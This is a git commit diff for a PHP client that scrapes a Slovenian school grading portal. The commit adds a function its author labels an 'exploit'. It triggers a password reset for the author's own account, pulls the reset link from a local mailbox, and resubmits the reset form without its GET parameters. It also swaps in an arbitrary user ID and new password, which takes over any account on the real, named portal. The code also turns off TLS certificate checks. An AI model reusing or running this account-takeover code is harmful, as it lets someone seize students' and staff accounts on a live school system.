summaryrefslogtreecommitdiffstats
path: root/main.php
diff options
context:
space:
mode:
authorAnton Luka Šijanec <sijanecantonluka@gmail.com>2020-02-12 20:00:39 +0100
committerAnton Luka Šijanec <sijanecantonluka@gmail.com>2020-02-12 20:00:39 +0100
commitb5473caafcadbb4efaf85cd2c23cae2e2f7af1dd (patch)
treec51b3ffe52d7a7402db9a770ceb2bd15a591dd8d /main.php
parentzdaj v headerju piše endpoint verzija (diff)
downloadgimsisextclient-b5473caafcadbb4efaf85cd2c23cae2e2f7af1dd.tar
gimsisextclient-b5473caafcadbb4efaf85cd2c23cae2e2f7af1dd.tar.gz
gimsisextclient-b5473caafcadbb4efaf85cd2c23cae2e2f7af1dd.tar.bz2
gimsisextclient-b5473caafcadbb4efaf85cd2c23cae2e2f7af1dd.tar.lz
gimsisextclient-b5473caafcadbb4efaf85cd2c23cae2e2f7af1dd.tar.xz
gimsisextclient-b5473caafcadbb4efaf85cd2c23cae2e2f7af1dd.tar.zst
gimsisextclient-b5473caafcadbb4efaf85cd2c23cae2e2f7af1dd.zip
Diffstat (limited to 'main.php')
-rw-r--r--main.php104
1 files changed, 95 insertions, 9 deletions
diff --git a/main.php b/main.php
index 065e0c5..e05f759 100644
--- a/main.php
+++ b/main.php
@@ -14,14 +14,14 @@ function strip_tags_content($text, $tags = '', $invert = FALSE) {
return preg_replace('@<(\w+)\b.*?>.*?</\1>@si', '', $text);
}
return $text;
-}
-function DOMinnerHTML(DOMNode $element) {
- $innerHTML = "";
+}
+function DOMinnerHTML(DOMNode $element) {
+ $innerHTML = "";
$children = $element->childNodes;
- foreach ($children as $child) {
+ foreach ($children as $child) {
$innerHTML .= $element->ownerDocument->saveHTML($child);
}
- return $innerHTML;
+ return $innerHTML;
}
function endsWith($haystack, $needle) {
$length = strlen($needle);
@@ -30,9 +30,9 @@ function endsWith($haystack, $needle) {
}
return (substr($haystack, -$length) === $needle);
}
-function startsWith ($string, $startString) {
- $len = strlen($startString);
- return (substr($string, 0, $len) === $startString);
+function startsWith ($string, $startString) {
+ $len = strlen($startString);
+ return (substr($string, 0, $len) === $startString);
}
function get_string_between($string, $start, $end){
$string = ' ' . $string;
@@ -53,11 +53,13 @@ Errors:
*/
class gimsisextClient {
private $username;
+ private $adminusername = "anton.sijanec";
private $password;
- public $version = array(0, 9, 3);
+ public $version = array(0, 10, 0);
private $programname = "gimsisextclient";
private $programdomain = 'gimsisextclient.gimb.tk';
private $cookiedir; // set at runtime, ker je get_curerent_user, v login()
+ private $mailbox = "/home/gimb/Mailbox";
private $gimsisextlogin = "https://zgimsis.gimb.org/gse/Logon.aspx";
private $gimsisexturnik = "https://zgimsis.gimb.org/gse/Page_Gim/Ucenec/DnevnikUcenec.aspx";
private $gimsisextocenjevanja = "https://zgimsis.gimb.org/gse/Page_Gim/Ucenec/IzpitiUcenec.aspx";
@@ -713,6 +715,7 @@ Errors:
$xmlDoc = new DOMDocument();
$xmlDoc->loadHTML( $resetgeslo_init_output );
$searchNode = $xmlDoc->getElementsByTagName( "input" );
+ $postvars = "";
foreach( $searchNode as $sn ) {
if($sn->getAttribute('name') != 'edtGSEUserId') {
$postvars .= urlencode($sn->getAttribute('name'))."=".urlencode($sn->getAttribute('value'))."&";
@@ -731,6 +734,89 @@ Errors:
if(strlen($odg) < strlen($odg2)) return $odg2;
}
}
+ private function parselastresetemail() {
+ $path = $this->mailbox."/new";
+ $latest_ctime = 0;
+ $latest_filename = '';
+ $d = dir($path);
+ while (false !== ($entry = $d->read())) {
+ $filepath = "{$path}/{$entry}";
+ // could do also other checks than just checking whether the entry is a file
+ if (is_file($filepath) && filectime($filepath) > $latest_ctime) {
+ $latest_ctime = filectime($filepath);
+ $latest_filename = $entry;
+ }
+ }
+ $fajl = file($this->mailbox."/new/".$latest_filename);
+ if (!$fajl) return false;
+ $mejl = preg_replace('/\s+/','',base64_decode(implode("", array_slice($fajl, 1+array_search(1, array_map("strlen", $fajl))))));
+ $datum = get_string_between($mejl, "o<b>", "ob");
+ $ura = get_string_between($mejl, "ob", "</b>.");
+ if (new DateTime > new DateTime($datum." ".$ura)) {
+ return false;
+ }
+ $link = get_string_between($mejl, "a'href='", "'>z");
+ return $link;
+ }
+ public function spremenigeslo($user, $newpass) { // exploit // delam na tem
+ $plre = $this->parselastresetemail();
+ while($plre == false) {
+ $this->resetgeslo($this->adminusername);
+ $plre = $this->parselastresetemail();
+ }
+ /*
+ $this->cookiedir = '/tmp/'.posix_getuid().'/'.$this->programdomain.'/cookiedir/';
+ if (!is_dir($this->cookiedir."spremenigeslo")) {
+ if (!mkdir($this->cookiedir.$this->username, 0700, true)) { // x permišn mora bit', da lahko dela poddirektorije, hence true, hence 0700; group in $
+ return -5;
+ }
+ }
+ */
+ $ch = curl_init();
+ curl_setopt($ch, CURLOPT_SSLVERSION, CURL_SSLVERSION_TLSv1_0);
+ curl_setopt($ch, CURLOPT_COOKIESESSION, true );
+ curl_setopt($ch, CURLOPT_COOKIEJAR, $this->cookiedir."spremenigeslo"."/cookie.txt" ); // cookiejar
+ curl_setopt($ch, CURLOPT_COOKIEFILE, $this->cookiedir."spremenigeslo"."/cookie.txt" ); // coolie file // this scuks
+ curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+ curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+ curl_setopt($ch, CURLOPT_VERBOSE, TRUE);
+ curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // return transfer?
+ curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); // follow 3xx redirects?
+ curl_setopt($ch, CURLOPT_MAXREDIRS, 10); // max 3xx redirectas?
+ curl_setopt($ch, CURLOPT_USERAGENT, $this->programdomain."/".implode(".", $this->version));
+ curl_setopt($ch, CURLOPT_AUTOREFERER, 1); // auto send refereres?
+ curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10); // timeout for tcp connection
+ curl_setopt($ch, CURLOPT_TIMEOUT, 10); // timeout for http response
+ curl_setopt($ch, CURLOPT_URL, $plre);
+ curl_setopt($ch, CURLOPT_POST, 0);
+ $spremenigeslo_init_output = curl_exec($ch);
+ $xmlDoc = new DOMDocument();
+ $xmlDoc->loadHTML( $spremenigeslo_init_output );
+ $searchNode = $xmlDoc->getElementsByTagName( "input" );
+ $postvars = "";
+ foreach( $searchNode as $sn ) {
+ if($sn->getAttribute('name') == 'hfIdUporabnik') {
+ $postvars .= urlencode($sn->getAttribute('name'))."=".urlencode($user)."&";
+ } else if($sn->getAttribute("name") == "edtGSEPassword") {
+ $postvars .= urlencode($sn->getAttribute('name'))."=".urlencode($newpass)."&";
+ } else if($sn->getAttribute("name") == "edtGSEPassword2") {
+ $postvars .= urlencode($sn->getAttribute('name'))."=".urlencode($newpass)."&";
+ } else {
+ $postvars .= urlencode($sn->getAttribute('name'))."=".urlencode($sn->getAttribute('value'))."&";
+ }
+ }
+ curl_setopt($ch, CURLOPT_URL, explode("?", $plre)[0]); // <!-- ključ exploita. Server inč ne javka, če GET parametrov ni... 1337 h@x3d xD <3
+ curl_setopt($ch, CURLOPT_POST, 1);
+ $postbody = "__EVENTTARGET=&__EVENTARGUMENT=&".substr($postvars, 0, -1); // ker ne rabmo zadnjega &
+ curl_setopt($ch, CURLOPT_POSTFIELDS, $postbody);
+ $spremenigeslo_output = curl_exec($ch);
+ file_put_contents("/tmp/222.html", $postbody);
+ if(get_string_between($spremenigeslo_output, "Geslo je z", "menjano") == "a") {
+ return true;
+ } else {
+ return false;
+ }
+ }
public function fetchocene() {
$ch = $this->login();
if(!curl_getinfo($ch)) {